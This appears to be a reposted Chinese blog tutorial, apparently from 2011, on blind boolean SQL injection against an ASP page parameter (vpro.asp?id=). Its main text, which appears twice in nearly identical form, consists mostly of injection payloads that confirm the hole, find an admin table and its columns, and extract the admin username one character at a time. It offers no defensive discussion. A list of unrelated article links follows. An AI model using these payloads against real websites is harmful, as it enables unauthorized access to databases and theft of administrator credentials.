or1=1脚本分析
2011-06-06 12:59
176 查看
先用or 1=1和or
1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or
1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的"假是真时真是假",比lake2大哥哥的IP欺骗更经典
哦,呵呵。
我们来构造测试语句:
vpro.asp?id=1 or exists(select * from admin)
返回错误页面,说明存在admin表我们来换一个表试试!
vpro.asp?id=1 or exists(select * from n0h4ck)
说明不存在n0h4ck这个表。
我们继续来,构造语句
vpro.asp?id=1 or exists(select admin from admin)
返回or 1=1的页面,说明admin表存在admin字段。
vpro.asp?id=1 or exists(select padd from admin)
返回or 1=2的页面,说明admin表不存在padd字段。
我们现在开始猜测数据了,
vpro.asp?id=1 or (select mid(admin,1,1) from admin)=’n’
返回or 1=2的页面,说明admin表admin字段的第一个数据的第一个字符不是"n"。
我们再来
vpro.asp?id=1 or (select mid(admin,1,1) from admin)=’a’
返回or 1=1的页面,说明说明admin表admin字段的第一个数据的第一个字符是"a",我们第一个会想到什么呢?当然是"admin"啦。
我们用left函数确定一下,
vpro.asp?id=1 or (select left(admin,5) from admin)=’admin’
猜测正确,的确是admin,好了,后面的话就不用我说了吧
1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or
1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的"假是真时真是假",比lake2大哥哥的IP欺骗更经典
哦,呵呵。
我们来构造测试语句:
vpro.asp?id=1 or exists(select * from admin)
返回错误页面,说明存在admin表我们来换一个表试试!
vpro.asp?id=1 or exists(select * from n0h4ck)
说明不存在n0h4ck这个表。
我们继续来,构造语句
vpro.asp?id=1 or exists(select admin from admin)
返回or 1=1的页面,说明admin表存在admin字段。
vpro.asp?id=1 or exists(select padd from admin)
返回or 1=2的页面,说明admin表不存在padd字段。
我们现在开始猜测数据了,
vpro.asp?id=1 or (select mid(admin,1,1) from admin)=’n’
返回or 1=2的页面,说明admin表admin字段的第一个数据的第一个字符不是"n"。
我们再来
vpro.asp?id=1 or (select mid(admin,1,1) from admin)=’a’
返回or 1=1的页面,说明说明admin表admin字段的第一个数据的第一个字符是"a",我们第一个会想到什么呢?当然是"admin"啦。
我们用left函数确定一下,
vpro.asp?id=1 or (select left(admin,5) from admin)=’admin’
猜测正确,的确是admin,好了,后面的话就不用我说了吧
相关文章推荐
- 一段恶意脚本的分析及思考
- Openwrt启动流程及启动脚本分析
- Kaldi脚本分析(6)——解码图构建
- 游标脚本性能问题解决与分析 (1) - Cursor Performance Analysis
- 自动分析黑名单及白名单的iptables脚本
- tcpdump Wireshark ,抓报分析脚本
- Hive客户端脚本CLI分析及debug环境搭建
- S3C2440链接脚本与位置无关码分析
- linux脚本使用-------安装madplay及MPlayer播放器脚本分析及命令参数前加“横杠”的背景解释
- 简单监控脚本细节分析
- 一段RUBY的脚本,分析姓名的分数,本来没甚么难的,就是ruby1.91的编码问题,导致一堆问题
- shell swap 占用分析脚本
- linux shell脚本文件执行分析
- 日志文件分析shell脚本六次提速过程
- u-boot中.lds连接脚本文件的分析
- NS2 trace文件分析脚本(适合无线trace)
- Unity3D 程序脚本反编译分析与加密
- AT91Bootstrap1.16源码中连接脚本文件(elf32-littlearm.lds)分析
- U-Boot编译过程完全分析-make ***_config 和mkconfig脚本,include/config.mk,include/config.h